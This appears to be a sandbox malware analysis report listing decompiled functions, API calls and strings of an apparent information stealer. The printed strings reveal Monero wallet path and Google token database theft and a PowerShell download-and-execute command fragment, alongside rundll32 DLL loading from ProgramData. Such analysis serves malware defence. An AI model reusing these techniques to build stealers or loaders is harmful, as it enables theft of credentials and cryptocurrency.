RegQueryValueExA.ADVAPI32(00081AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00081AA4
RegCloseKey.ADVAPI32(00081AE9), ref: 00081AAD

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00081A7F
wallet_path, xrefs: 00081A9C

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: 8a38e99a1c91602e99152ae0c55544bbf28e9d29fc696bda232c8a71813086a8
Instruction ID: 2f291944c660d135648e1755d7f34c44735bcfde6e258b334a5d2f85fcbc282c
Opcode Fuzzy Hash: 8a38e99a1c91602e99152ae0c55544bbf28e9d29fc696bda232c8a71813086a8
Instruction Fuzzy Hash: 26F05E75B40304BFFB106B90EC0FFAA7B7CEB44B45F150065F701A9090E6B0AE409720

Function 00089A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

lstrlenA.KERNEL32(?), ref: 00089BB2

Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00089BCF
lstrlenA.KERNEL32(?), ref: 00089C7E
lstrlenA.KERNEL32(?), ref: 00089C99

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Strings

GoogleAccounts, xrefs: 00089A8E
AccountId, xrefs: 00089BC9
GoogleAccounts, xrefs: 00089A37
SELECT service, encrypted_token FROM token_service, xrefs: 00089B1F

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 615ff5e74c3494a61ba069fc71d44a81ad605f2c5b87e57a131e0e000b9a522f
Instruction ID: eb0fa390bac1ec540c1299cd7abafc3420528d234759d8248520097287e9a5a9
Opcode Fuzzy Hash: 615ff5e74c3494a61ba069fc71d44a81ad605f2c5b87e57a131e0e000b9a522f
Instruction Fuzzy Hash: D681E332900119EFCF01FBA4ED469EEB7B5FF14305F510061F990BB162DB21AE5A9BA1

Function 00092D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

ShellExecuteEx.SHELL32(?), ref: 00092EC0

Strings

C:\ProgramData\, xrefs: 00092DA3
.ps1, xrefs: 00092DF3
')", xrefs: 00092E13
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092E5B
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092E18

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: 882bf6df716a2ccd98070f4d7fd31b9c01310fe9472866f90abe2e01b3f1cb5c
Instruction ID: e8d5b4538160169d21ffffecb1a05dca8bd9a3bc295bedc344e5c96f351d8843
Opcode Fuzzy Hash: 882bf6df716a2ccd98070f4d7fd31b9c01310fe9472866f90abe2e01b3f1cb5c
Instruction Fuzzy Hash: B541B232E40129ABCF11FBA4DC429CDB7B4FF04700F5141A6FAA4B7112DB30AE4A9B90

Function 0009FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0009FA6D
DName::operator+.LIBCMT ref: 0009FA74
DName::DName.LIBCMT ref: 0009FA96
DName::operator+.LIBCMT ref: 0009FA9D
DName::operator+.LIBCMT ref: 0009FAA4

Strings

throw(, xrefs: 0009FA65, 0009FA8E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: e78e6b111a783753adc6c8c8cfe9013bb90b9dc5cc6107fe9bd85a7592b51b7c
Instruction ID: 01d4b6466474fade8255f0178aa7b29c66950f0258c4a17c61b62f5d6b8ebd71
Opcode Fuzzy Hash: e78e6b111a783753adc6c8c8cfe9013bb90b9dc5cc6107fe9bd85a7592b51b7c
Instruction Fuzzy Hash: 4F01927060020AAFCF14EBA4D852EFD7BB5EF44748F04406AF905DB2A6DB70EA45DB80

Function 00093259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00093278
StrCmpCA.SHLWAPI(00000000,000B67D8), ref: 000932B1
strtok_s.MSVCRT ref: 00093371

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 42b20951345bbe5fd40c717cefe256bf97dbd9ca2a9237ebc250c3c9446fc1bb
Instruction ID: 28c66f9b6faf548849565c8a6a64e15bc71682c269006d21fb3ed27e6d769a48
Opcode Fuzzy Hash: 42b20951345bbe5fd40c717cefe256bf97dbd9ca2a9237ebc250c3c9446fc1bb
Instruction Fuzzy Hash: 063193B1E45105AFCF649F68DC86BA97BE8FF18709F519059E805DB192EB34CB40AF40

Function 0009566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000956A4
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,00000000,?), ref: 000956C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 000956EA
RegCloseKey.ADVAPI32(?), ref: 000956F6
lstrcatA.KERNEL32(?,?), ref: 00095725
lstrcatA.KERNEL32(?), ref: 00095738

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID:
API String ID: 3891774339-0
Opcode ID: 4a3ac807300b3da5d200ced3b6883e705e4f850395028de153b36bd0cc9f087e
Instruction ID: 8e75fe307b5c828e0bb82439f275557619e858aefbb1b7fe2cb3568672a870f6
Opcode Fuzzy Hash: 4a3ac807300b3da5d200ced3b6883e705e4f850395028de153b36bd0cc9f087e
Instruction Fuzzy Hash: E5418C7198001D9FCF55BB20EC8AEE877B9BF18305F4004A6B519A7162EE709EC69F90

Function 00092962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

ShellExecuteEx.SHELL32(?), ref: 00092B84

Strings

C:\Windows\system32\rundll32.exe, xrefs: 00092AE3
C:\ProgramData\, xrefs: 00092995
.dll, xrefs: 000929ED
"" , xrefs: 00092A32

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: dc40db06c02cda619585ab94268668ebcd1aee345e20f739e97a48d117b6c7d9
Instruction ID: 071eb3481bd08138e4a0de9e58260fece028d231d2fdc5c28922c526a9b59f0c
Opcode Fuzzy Hash: dc40db06c02cda619585ab94268668ebcd1aee345e20f739e97a48d117b6c7d9
Instruction Fuzzy Hash: DB718F32D10119ABCF11FFA5D842ADEB7B4BF04700F514161FAA0B7162DB70AE4A9B90

Function 0008826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00088307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0008833C

Strings

ERROR_RUN_EXTRACTOR, xrefs: 000882BE
v10, xrefs: 000882CE
v20, xrefs: 00088286

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: 8b2dfa91d6ecc90a2a0ebbd670046ea0ac5ffac86fa95cb960ab8629d6f1830a
Instruction ID: e2ba32b757a615a2c51e82a4a7b521bc5c2d11637a02988549d7ee8fbf9160ea
Opcode Fuzzy Hash: 8b2dfa91d6ecc90a2a0ebbd670046ea0ac5ffac86fa95cb960ab8629d6f1830a
Instruction Fuzzy Hash: 3A41AF72A00118ABCF10EFA9DC469DE7BA8BF44720F158525F944E7281EB70DE458BA1

Function 0009BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0009C58F,?,00096F27), ref: 0009C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C083

Part of subcall function 0009B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0009B9C5

Strings

'o, xrefs: 0009BFD6

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
